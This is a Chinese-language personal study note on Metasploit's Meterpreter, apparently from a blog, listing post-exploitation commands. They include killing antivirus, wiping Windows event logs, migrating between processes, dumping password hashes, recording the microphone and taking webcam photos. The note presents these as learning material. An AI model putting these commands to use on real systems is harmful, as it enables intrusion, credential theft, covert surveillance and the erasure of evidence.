再学Metasploit

之前学习的Metasploit没有写笔记都忘掉了,这次叫完整的学习内容记录下来

要是自己通过什么漏洞或者什么方式拿到了shell,但是这个shell不是很方便,比如叫他做查看目标的桌面。监听目标的麦克风,打开目标的摄像头,都是很难实现的,
我们就可以使用Metasploit

他的工作方式

  • 是完全在内存里面,不会写入硬盘里面,查杀硬盘的杀毒软件是无效的
  • 他会注入到合法的进程里面
  • 基于注入的进程上传和预加载DLL进行扩展模块的注入(客户端API)
  • 基于注入的进程建立的socket连接建立加密的TLS通信隧道
  • 利用TLS隧道进一步加载后续扩展模块(避免网络取证),这样就不能发现里面的传输的内容

客户端提供基于ruby的全特性的API ,他支持任何语言,

拿到的shell是这样的,就是Metasploit的shell

  1. Metasploit的shell文件操作
    在这里插入图片描述
    这个shell 输入linux的命令也可以输入win系统命令也可以操控目标shell
    在这里插入图片描述
    如果想操控kali自己加上l
    在这里插入图片描述

  2. runbgrun命令:多功能,拿到了目标的Metasploit的shell可以使用下面的模块
    run是前台执行, bgrun是后台执行
    bgrun输入这个命令在按两下Tab键可以看到可以的功能
    可以看到有290个可以用的功能
    在这里插入图片描述
    这个killav是可以杀死杀毒软件的在这里插入图片描述
    使用bgrun killav
    这样就杀死了目标的杀毒软件
    在这里插入图片描述
    打开目标的桌面使用vnc功能,被攻击端操作的什么我都能看见
    命令bgrun vnc
    在这里插入图片描述
    有的模块不能保证在目标机器上正常运行

  3. clearev命令:清除win系统日志,
    在运行里输入eventvwr进入win系统日志
    在这里插入图片描述
    在kali进行Metasploit的shell清除日志
    在这里插入图片描述
    效果
    在这里插入图片描述
    但是有一个清除日志
    在这里插入图片描述

  4. download命令:下载目标系统文件

    命令

1
download  要下载的文件名字  要下载的地方

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421111514213.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421111546644.png)
  1. upload命令:给目标系统上传
    命令
1
upload  本地的文件   目标的目录

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421111926593.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421112010474.png)
  1. execute命令:执行目标系统命令
    可以执行,比如:文本,cmd,等等等 
    1
    execute -f 要执行的命令
    这个是叫上了-i在后台运行的意思
    在这里插入图片描述
    提出命令exit
  2. getuid命令:查看那个用户登录上了的
    在这里插入图片描述
    如果要修改用户可以用这个名getsystem
  3. getprivs命令:查看用户权限
    在这里插入图片描述
  4. getproxy命令:获取目标IE浏览器的代理
  5. getpid命令:查看注入的进程的id 和 migrate命令:切换注入到其他进程里面
    10.1getpid命令
    在这里插入图片描述
    ps命令查看id
    这个进程里面
    在这里插入图片描述
    10.2 migrate切换注入到其他进程里面
    
1
migrate  要注入的id数

    ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421115606839.png)
  1. hashdump命令:查看目标用户的密码
    在这里插入图片描述
  2. sysinfo命令:目标操作系统信息
    在这里插入图片描述
  3. kill命令:杀死进程
    ps查看进程id 
1
kill  要杀死的进程id
  1. reboot命令:重启机器,这个都知道就不演示了
  2. shutdown命令:关闭机器 这个都知道就不演示了
  3. shell命令:获得操作系统的shell
    在这里插入图片描述
    exit退出
  4. show_mount命令:查看硬盘
    在这里插入图片描述
  5. search命令:搜索目标系统的文件

网络相关的命令

  1. arp命令:查看目标机器的arp缓存
  2. netstat命令:命令查看网络连接情况
    在这里插入图片描述
  3. ifconfigipconfig命令:就不用说了都知道
  4. route命令:查看目标的路由表
    在这里插入图片描述
    添加路由表和删除路由表这个我就不做演示了查看更多参数route -h

上面都是网络相关的命令

  1. idletime命令: 查看目标多长时间没有操控电脑了
    在这里插入图片描述
  2. resource命令:调用一个文件读取里面的命令
    命令
1
resource  -r 要指定的文件

其他的

  1. record_mic命令:黑客就可以用这个命令进行监听目标的麦克风

    命令

1
record_mic -d 要指定几秒

看一下效果
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421122126564.png)
是完全可以听见声音的
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200421122227535.png)

  1. webcam_list命令:列出目标机器上的摄像头
    在这里插入图片描述

  2. webcam_snap命令:命令进行拍照可以实现偷窥

    在这里插入图片描述
    在这里插入图片描述

Meterpreter Python扩展

无需安装Python运行环境,就能运行原生Python代码
load python
– Help
– python_execute “print (‘asdasdas’)”
– python_execute “import os; cd = os.getcwd()” -r cd
– python_import -f find.py